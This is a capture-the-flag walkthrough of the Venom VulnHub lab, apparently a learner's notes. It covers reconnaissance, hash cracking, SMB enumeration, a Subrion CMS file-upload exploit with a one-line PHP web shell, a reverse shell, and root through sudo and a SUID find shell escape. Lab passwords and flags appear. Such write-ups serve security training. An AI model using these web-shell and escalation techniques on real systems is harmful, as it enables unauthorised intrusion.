
Notes from rooting the Venom boot2root VM (VulnHub)

References:
https://nepcodex.com/2021/06/venom-walkthrough-vulnhub-writeup/
https://grumpygeekwrites.wordpress.com/2021/06/20/vulnhub-venom-walk-through-tutorial-writeup/

Host discovery

Live hosts on the lab subnet were found with arp-scan (ARP works well on a local VMware segment and is not affected by host firewalls):

sudo arp-scan 192.168.109.0/24
[sudo] password for kali:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d6:59:a7, IPv4: 192.168.109.140
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.109.2 00:50:56:f0:a1:15 VMware, Inc.
192.168.109.1 00:50:56:c0:00:08 VMware, Inc.
192.168.109.147 00:0c:29:90:08:c7 VMware, Inc.
192.168.109.254 00:50:56:f8:89:68 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.930 seconds (132.64 hosts/sec). 4 responded

The target is 192.168.109.147 (the other three addresses are the VMware host-side interfaces). Next, port-scan it to gather more information.

Port scan

A full TCP port scan with default scripts and version detection:

nmap -sC -sV -p- 192.168.109.147   
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-28 09:08 EDT
Nmap scan report for 192.168.109.147
Host is up (0.00032s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/https Apache/2.4.29 (Ubuntu)
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: VENOM; OS: Unix

Host script results:
|_clock-skew: mean: 6h09m59s, deviation: 3h10m31s, median: 7h59m58s
|_nbstat: NetBIOS name: VENOM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: venom
| NetBIOS computer name: VENOM\x00
| Domain name: \x00
| FQDN: venom
|_ System time: 2021-07-29T02:38:46+05:30
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-28T21:08:46
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.02 seconds

The scan shows 21 (ftp), 80 (http), 139 (smb), 443 (https) and 445 (smb) open.

Plan of attack per port:

  • ftp (21):
    • try anonymous login: dead end ✘
    • search exploit databases for this version: vsftpd 3.0.3 has no public exploit (the well-known backdoor is in 2.3.4), dead end ✘
  • http (80):
    • read the page source for sensitive information ✔ (I did not look carefully here during the attempt and missed the key foothold)
  • smb (139, 445):
    • MS17-010 scanning with MSF ✗ (that check targets Windows SMBv1; this is Samba 4.7.6 on Ubuntu, so it does not apply)
    • enumerate the SMB service ✔
  • https (443):
    • no ideas for this port yet

After working through the above and checking the references, the foothold is on http (80).

Directory brute-force

A quick dirb run with the default wordlist:

dirb http://192.168.109.147:80/ 

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Jul 31 11:10:45 2021
URL_BASE: http://192.168.109.147:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.109.147:80/ ----
+ http://192.168.109.147:80/index.html (CODE:200|SIZE:11004)
+ http://192.168.109.147:80/server-status (CODE:403|SIZE:280)

-----------------
END_TIME: Sat Jul 31 11:10:48 2021
DOWNLOADED: 4612 - FOUND: 2

index.html returns 200 and is the stock "Apache2 Ubuntu Default Page", so at the time I did not think to view its source. Damn. The end of the source hides an MD5 hash (screenshot in the original post).

Reversing the hash

MD5 is a hash, not encryption, so it cannot be "decrypted"; an unsalted MD5 of a dictionary word is found instantly by an online lookup table or a wordlist attack. The hash resolves to hostinger (screenshot in the original post). Following the writeups, the next step is to enumerate the SMB service. Noting this down, since this was my first time doing information gathering against port 445.
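The lookup step above, as an added example rather than anything from the original post: identify the candidate algorithm from the digest's shape, then run a wordlist against it. The wordlist here is constructed for the example (a real run would use rockyou.txt or similar), and the page's actual hash is not reproduced, so the test hashes the known answer itself.

```python
import hashlib

# Constructed candidate list standing in for a real wordlist such as rockyou.txt.
WORDLIST = ["password", "admin", "venom", "hostinger", "nathan", "dora"]

# Hex digest length -> unsalted algorithms that produce it.
CANDIDATES_BY_LEN = {
    32: ["md5"],
    40: ["sha1"],
    64: ["sha256"],
    128: ["sha512"],
}


def identify(hex_digest):
    """Return the algorithms whose unsalted hex output has this digest's shape."""
    h = hex_digest.strip().lower()
    if not h or any(c not in "0123456789abcdef" for c in h):
        return []
    return CANDIDATES_BY_LEN.get(len(h), [])


def digest_hex(algorithm, word):
    """Hex digest of a word under a hashlib algorithm name (md5, sha1, ...)."""
    return hashlib.new(algorithm, word.encode()).hexdigest()


def crack(hex_digest, wordlist):
    """Try each candidate algorithm over the wordlist; return (algorithm, word) or None.

    This is exactly why an unsalted MD5 of a dictionary word gives no protection:
    the attacker only needs to hash guesses until one matches.
    """
    target = hex_digest.strip().lower()
    for algorithm in identify(target):
        for word in wordlist:
            if digest_hex(algorithm, word) == target:
                return algorithm, word
    return None


if __name__ == "__main__":
    # Stand-in for the hash found in the page source on the box.
    found = digest_hex("md5", "hostinger")
    print(found, "->", crack(found, WORDLIST))
```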

SMB enumeration

Following the writeups, enumerate with enum4linux (null session allowed, so RID cycling works without credentials):

enum4linux -a 192.168.109.147
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jul 28 09:18:59 2021

==========================
| Target Information |
==========================
Target ........... 192.168.109.147
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


=======================================================
| Enumerating Workgroup/Domain on 192.168.109.147 |
=======================================================
[+] Got domain/workgroup name: WORKGROUP

===============================================
| Nbtstat Information for 192.168.109.147 |
===============================================
Looking up status of 192.168.109.147
VENOM <00> - B <ACTIVE> Workstation Service
VENOM <03> - B <ACTIVE> Messenger Service
VENOM <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

========================================
| Session Check on 192.168.109.147 |
========================================
[+] Server 192.168.109.147 allows sessions using username '', password ''

==============================================
| Getting domain SID for 192.168.109.147 |
==============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

=========================================
| OS information on 192.168.109.147 |
=========================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.109.147 from smbclient:
[+] Got OS info for 192.168.109.147 from srvinfo:
VENOM Wk Sv PrQ Unx NT SNT venom server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03

================================
| Users on 192.168.109.147 |
================================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

============================================
| Share Enumeration on 192.168.109.147 |
============================================

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (venom server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 192.168.109.147
//192.168.109.147/print$ Mapping: DENIED, Listing: N/A
//192.168.109.147/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

=======================================================
| Password Policy Information for 192.168.109.147 |
=======================================================


[+] Attaching to 192.168.109.147 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

[+] VENOM
[+] Builtin

[+] Password Info for Domain: VENOM

[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


=================================
| Groups on 192.168.109.147 |
=================================

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

==========================================================================
| Users on 192.168.109.147 via RID cycling (RIDS: 500-550,1000-1050) |
==========================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-3525385883-4254613925-43684688
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-3525385883-4254613925-43684688 and logon username '', password ''

...skip...

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\nathan (Local User)
S-1-22-1-1002 Unix User\hostinger (Local User)

================================================
| Getting printer info for 192.168.109.147 |
================================================
No printers returned.


enum4linux complete on Wed Jul 28 09:19:14 2021

Enumeration shows hostinger is one of the local users. Combined with the word recovered from the MD5 hash, try it as an FTP credential.

FTP login

ftp 192.168.109.147
Connected to 192.168.109.147.
220 (vsFTPd 3.0.3)
Name (192.168.109.147:kali): hostinger
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 1002 1002 4096 May 21 23:43 files
226 Directory send OK.
ftp> cd files
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 384 May 21 23:43 hint.txt
226 Directory send OK.
ftp> get hint.txt
local: hint.txt remote: hint.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for hint.txt (384 bytes).
226 Transfer complete.
384 bytes received in 0.04 secs (10.3970 kB/s)

Login succeeds (hostinger / hostinger). The files directory holds hint.txt; download it and read it:

	Hey there... 

T0D0 --

* You need to follow the 'hostinger' on WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= also aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=
* some knowledge of cipher is required to decode the dora password..
* try on venom.box
password -- L7f9l8@J#p%Ue+Q1234 -> deocode this you will get the administrator password


Have fun .. :)

hint.txt contains two base64-encoded strings.

Base64 decoding

echo 'WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0=' | base64 -d | base64 -d | base64 -d
standard vigenere cipher
echo 'aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=' | base64 -d
https://cryptii.com/pipes/vigenere-cipher

The first string is base64 wrapped three times (hence the three chained base64 -d calls above); the second decodes to a URL.

Summary of what we have:

  • Decoding the base64 gives the full hint:
    You need to follow the 'hostinger' on standard vigenere cipher also https://cryptii.com/pipes/vigenere-cipher
  • The box's hostname is venom.box

Add the hostname to the hosts file (192.168.109.147 venom.box in /etc/hosts); browsing to it returns a new page. Following another writeup, treat the string L7f9l8@J#p%Ue+Q1234 as a Vigenère ciphertext with key hostinger and decrypt it at https://cryptii.com/pipes/vigenere-cipher: the result is dora's password (screenshot in the original post).
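The two decoding steps above, done offline in one script. This is an added example, not code from the original post: the nested-base64 peel stops on its own when the payload is no longer valid base64, and the Vigenère routine follows the cryptii convention (assumed here) that non-letters pass through without consuming a key character, which is what makes the digits and symbols in the password survive unchanged.

```python
import base64
import binascii

# Strings taken from hint.txt on the box.
HINT_CIPHER_B64 = "WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0="
HINT_URL_B64 = "aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI="
PASSWORD_CIPHERTEXT = "L7f9l8@J#p%Ue+Q1234"
KEY = "hostinger"  # the hint says to "follow the 'hostinger'"


def peel_base64(blob, max_layers=16):
    """Decode nested base64 until the result is no longer base64 or no longer text.

    Returns (final_text, layers_removed). validate=True makes b64decode reject any
    character outside the base64 alphabet, which is what stops the loop once the
    payload is plain text (spaces, ':' and '-' are not base64 characters).
    """
    current = blob.strip()
    layers = 0
    while layers < max_layers:
        try:
            raw = base64.b64decode(current, validate=True)
            text = raw.decode("ascii")
        except (binascii.Error, ValueError):
            break  # not base64 any more: we have reached the payload
        if not all(c.isprintable() or c in "\r\n\t" for c in text):
            break  # decoded to binary junk, so the previous layer was the payload
        current = text
        layers += 1
    return current, layers


def vigenere_decrypt(ciphertext, key):
    """Standard Vigenere decryption, cryptii-style (assumption): only ASCII letters
    are shifted, case is preserved, and non-letters are copied through without
    advancing the key."""
    out = []
    key_pos = 0
    for ch in ciphertext:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            shift = ord(key[key_pos % len(key)].lower()) - ord("a")
            out.append(chr((ord(ch) - base - shift) % 26 + base))
            key_pos += 1
        else:
            out.append(ch)
    return "".join(out)


if __name__ == "__main__":
    text, layers = peel_base64(HINT_CIPHER_B64)
    print(f"{layers} base64 layer(s): {text}")
    url, layers = peel_base64(HINT_URL_B64)
    print(f"{layers} base64 layer(s): {url}")
    print("dora password:", vigenere_decrypt(PASSWORD_CIPHERTEXT, KEY))
```

If the key-advance convention is wrong for a given tool (some implementations consume a key letter on every character, including digits), the letters come out shifted by the wrong amount; when a decrypted candidate fails to log in, that convention is the first thing to flip.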

Logging in to venom.box

(Screenshot in the original post.) The page footer reports Subrion CMS 4.2.1. A search on exploit-db shows this version has an arbitrary file upload vulnerability.

Exploitation

(Screenshot of the upload in the original post.) Upload a one-line PHP web shell to get command execution. As the exploit notes explain, this version's .htaccess only blocks the obvious PHP extensions and leaves .pht and .phar unfiltered, so the shell is uploaded with a .phar extension:

cat php-shell.phar
<?php system($_GET['cmd']); ?>

Requesting the uploaded file with ?cmd=id confirms command execution (screenshot in the original post).
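Why the .phar slipped through, shown as an added example (not code from the CMS or the original post): the weak filter is a deny-list of PHP extensions, and the fix is an allow-list of harmless ones. The deny pattern below is an assumption for illustration; the page does not show the real .htaccess. The sample filenames are constructed.

```python
import os
import re

# Deny-list in the spirit of the weak .htaccess described above (assumed pattern):
# only the extensions the author thought of are refused.
DENY_RE = re.compile(r"\.(php|php3|php4|php5|phtml)$", re.IGNORECASE)

# Allow-list for an image/document upload feature: everything else is refused.
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}


def denylist_accepts(filename):
    """Weak check: refuse only names ending in a listed PHP extension."""
    return DENY_RE.search(filename) is None


def allowlist_accepts(filename):
    """Hardened check: no path components, exactly one dot, a known-harmless extension."""
    base = os.path.basename(filename)
    if base != filename or base.count(".") != 1:
        return False  # traversal, hidden files such as .htaccess, double extensions
    ext = os.path.splitext(base)[1].lower()
    return ext in ALLOWED_EXT


def compare(filenames):
    """Map each name to (deny-list verdict, allow-list verdict) for a side-by-side view."""
    return {name: (denylist_accepts(name), allowlist_accepts(name)) for name in filenames}


# Constructed sample upload names, including the .phar used on this box.
SAMPLES = [
    "avatar.png",
    "php-shell.php",
    "php-shell.phar",
    "php-shell.pht",
    "shell.php.png",
    ".htaccess",
    "../../etc/passwd.png",
]

if __name__ == "__main__":
    for name, (deny_ok, allow_ok) in compare(SAMPLES).items():
        print(f"{name:24} deny-list: {'accept' if deny_ok else 'reject':6} "
              f"allow-list: {'accept' if allow_ok else 'reject'}")
```

The filter is only half the story: whether an uploaded .phar actually executes depends on the web server's handler mapping, and on Ubuntu's stock PHP module configuration the PHP handler is applied to .php, .phar and .phtml alike, which is why the .phar shell runs here. Note also that the deny-list happily accepts an uploaded .htaccess, which an attacker can use to map any extension to PHP.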

Getting a shell

Use the uploaded web shell to launch a Python reverse shell back to the attacker box (screenshot of the request in the original post), with a listener waiting on port 4444:

nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.109.140] from venom.box [192.168.109.147] 33098
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Shell obtained, landing in the upload directory (the duplicated command lines in the transcripts below are the shell echoing input because there is no tty; they are collapsed here). Move to /home and list the users:

$ cd /home
$ ls -lart
total 16
drwxr-xr-x 24 root root 4096 May 20 10:08 ..
drwxr-xr-x 4 root root 4096 May 21 17:00 .
drwxr-x--- 17 nathan nathan 4096 May 22 00:21 nathan
drwxr-xr-x 16 hostinger hostinger 4096 May 22 13:58 hostinger

su to hostinger with the password hostinger (the FTP credential, reused). Once in, the file /var/www/html/subrion/backup/.htaccess contains nathan's password.

Switch to nathan and grab the first flag:

su nathan
Password: FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a

nathan@venom:/var/www/html/subrion/backup$ id
uid=1000(nathan) gid=1000(nathan) groups=1000(nathan),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
nathan@venom:/var/www/html/subrion/backup$ cd
nathan@venom:~$ ls
Desktop Downloads Music Public user.txt
Documents examples.desktop Pictures Templates Videos
nathan@venom:~$ cat user.txt
W3_@r3_V3n0m:P

Privilege escalation

First, check what sudo allows:

nathan@venom:~$ sudo -l
Matching Defaults entries for nathan on venom:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nathan may run the following commands on venom:
    (root) ALL, !/bin/su
    (root) ALL, !/bin/su

As the references note, sudo bash is enough here. The rule grants ALL as root and only excludes /bin/su; the sudoers manual itself warns that "!" exclusions cannot reliably restrict a user who is otherwise allowed ALL, because any other shell (sudo bash, sudo sh, sudo -i) gives root just the same, and su itself remains reachable indirectly (sudo bash -c su, or a copy of the binary under another path). Excluding a single binary from ALL is no restriction at all.

nathan@venom:~$ sudo bash
root@venom:~# id
uid=0(root) gid=0(root) groups=0(root)
Second route: SUID binaries

Look for files with the SUID bit set:

nathan@venom:~$ find / -perm -4000 -exec ls -al {} \; 2>/dev/null
-rwsr-xr-x 1 root root 1473576 Apr 20 10:15 /opt/VBoxGuestAdditions-6.1.20/bin/VBoxDRMClient
-rwsr-s--- 1 root nathan 238080 Nov 5 2017 /usr/bin/find
-rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 44528 Mar 23 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 59640 Mar 23 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 22528 Jun 28 2019 /usr/bin/arping
-rwsr-xr-x 1 root root 75824 Mar 23 2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 40344 Mar 23 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 76496 Mar 23 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 149080 Jan 31 2020 /usr/bin/sudo
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-sr-x 1 root root 10232 Jul 3 2020 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 113528 Jul 10 2020 /usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 378600 Jul 23 2020 /usr/sbin/pppd
-rwsr-xr-x 1 root root 43088 Mar 5 2020 /bin/mount
-rwsr-xr-x 1 root root 26696 Mar 5 2020 /bin/umount
-rwsr-xr-x 1 root root 44664 Mar 23 2019 /bin/su
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
-rwsr-xr-x 1 root root 43088 Sep 17 2020 /snap/core18/2066/bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /snap/core18/2066/bin/ping
-rwsr-xr-x 1 root root 44664 Mar 23 2019 /snap/core18/2066/bin/su
-rwsr-xr-x 1 root root 26696 Sep 17 2020 /snap/core18/2066/bin/umount
-rwsr-xr-x 1 root root 76496 Mar 23 2019 /snap/core18/2066/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 23 2019 /snap/core18/2066/usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 23 2019 /snap/core18/2066/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 23 2019 /snap/core18/2066/usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 23 2019 /snap/core18/2066/usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Jan 19 2021 /snap/core18/2066/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 11 2020 /snap/core18/2066/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /snap/core18/2066/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43088 Mar 5 2020 /snap/core18/1885/bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /snap/core18/1885/bin/ping
-rwsr-xr-x 1 root root 44664 Mar 23 2019 /snap/core18/1885/bin/su
-rwsr-xr-x 1 root root 26696 Mar 5 2020 /snap/core18/1885/bin/umount
-rwsr-xr-x 1 root root 76496 Mar 23 2019 /snap/core18/1885/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 23 2019 /snap/core18/1885/usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 23 2019 /snap/core18/1885/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 23 2019 /snap/core18/1885/usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 23 2019 /snap/core18/1885/usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Jan 31 2020 /snap/core18/1885/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 11 2020 /snap/core18/1885/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /snap/core18/1885/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 110792 Jul 11 2020 /snap/snapd/8542/usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 111080 Apr 24 17:35 /snap/snapd/11841/usr/lib/snapd/snap-confine
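
Most of that list is the distro's stock SUID set plus the copies inside read-only snap images; the two entries that matter are VBoxDRMClient (not a distro binary) and /usr/bin/find. The triage below is an added example, not a tool from the original post: it parses ls -l lines, skips the snap mounts, and flags anything outside a baseline or known to GTFOBins. The baseline is a hand-maintained assumption for Ubuntu 18.04, and the sample lines are a constructed subset of the output above.

```python
import re

# Stock Ubuntu 18.04 SUID set (hand-maintained baseline; an assumption for this example).
BASELINE = {
    "/usr/bin/pkexec", "/usr/bin/chsh", "/usr/bin/passwd", "/usr/bin/arping",
    "/usr/bin/gpasswd", "/usr/bin/traceroute6.iputils", "/usr/bin/newgrp",
    "/usr/bin/chfn", "/usr/bin/sudo", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/policykit-1/polkit-agent-helper-1", "/usr/lib/xorg/Xorg.wrap",
    "/usr/lib/snapd/snap-confine", "/usr/sbin/pppd", "/bin/mount", "/bin/umount",
    "/bin/su", "/bin/fusermount", "/bin/ping",
}

# Binaries GTFOBins documents as giving a shell or file access when SUID.
GTFOBINS_SUID = {"find", "bash", "sh", "vim", "vi", "nmap", "python", "python3",
                 "perl", "awk", "env", "cp", "mv", "tar", "less", "more", "nano"}

# mode links owner group size month day year-or-time path
LS_RE = re.compile(
    r"^(?P<mode>[-a-zA-Z]{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+\d+\s+"
    r"\S+\s+\d+\s+\S+\s+(?P<path>/\S+)$"
)


def parse_ls_line(line):
    """Return the fields of one 'ls -al' line as a dict, or None if it is not one."""
    m = LS_RE.match(line.strip())
    return m.groupdict() if m else None


def triage(ls_lines):
    """Return [(path, [reasons])] for SUID entries that deserve a manual look."""
    findings = []
    for line in ls_lines:
        entry = parse_ls_line(line)
        if entry is None or entry["mode"][3].lower() != "s":
            continue  # not an ls line, or not SUID
        path = entry["path"]
        if path.startswith("/snap/"):
            continue  # read-only snap images, not on the user's PATH
        name = path.rsplit("/", 1)[-1]
        known_escape = name in GTFOBINS_SUID
        off_baseline = path not in BASELINE
        if not (known_escape or off_baseline):
            continue
        reasons = []
        if known_escape:
            reasons.append(f"GTFOBins lists a SUID escape for {name}")
        if off_baseline:
            reasons.append("not in the distro baseline")
        if entry["owner"] == "root" and entry["mode"][9] != "x":
            # stock SUID binaries are world-executable; a root-owned one that only
            # a single group may run looks deliberately placed
            reasons.append(f"others cannot run it; group {entry['group']} only")
        findings.append((path, reasons))
    return findings


# Constructed subset of the find output above.
SAMPLE = """
-rwsr-xr-x 1 root root 1473576 Apr 20 10:15 /opt/VBoxGuestAdditions-6.1.20/bin/VBoxDRMClient
-rwsr-s--- 1 root nathan 238080 Nov 5 2017 /usr/bin/find
-rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 59640 Mar 23 2019 /usr/bin/passwd
-rwsr-xr-- 1 root messagebus 42992 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-- 1 root dip 378600 Jul 23 2020 /usr/sbin/pppd
-rwsr-xr-x 1 root root 44664 Mar 23 2019 /bin/su
-rwsr-xr-x 1 root root 44664 Mar 23 2019 /snap/core18/2066/bin/su
"""
SAMPLE_LINES = SAMPLE.strip().splitlines()

if __name__ == "__main__":
    for path, reasons in triage(SAMPLE_LINES):
        print(path)
        for reason in reasons:
            print("   -", reason)
```

On this box the script singles out /usr/bin/find, which is root-owned, SUID, and runnable only by group nathan: the mode -rwsr-s--- is the giveaway, since no packaged SUID binary looks like that.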

Following the references, /usr/bin/find is the way in: it is SUID root (and executable only by root and group nathan, which marks it as deliberately planted). As documented on GTFOBins, find runs whatever -exec names with the elevated effective uid, and -p tells the spawned shell to keep that euid instead of resetting it to the real uid. That is why id below shows uid=1000 but euid=0. Use it to read the second flag:

$ pwd
/home/nathan
$ /usr/bin/find . -exec /bin/sh -p \; -quit
# id
uid=1000(nathan) gid=1000(nathan) euid=0(root) groups=1000(nathan),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
# cd /root/
# ls
root.txt snap
# cat root.txt
#root_flag
H@v3_a_n1c3_l1fe.

done

Lessons learned

  • Not careful enough
  • No clear methodology; my thinking was scattered
  • Keep at it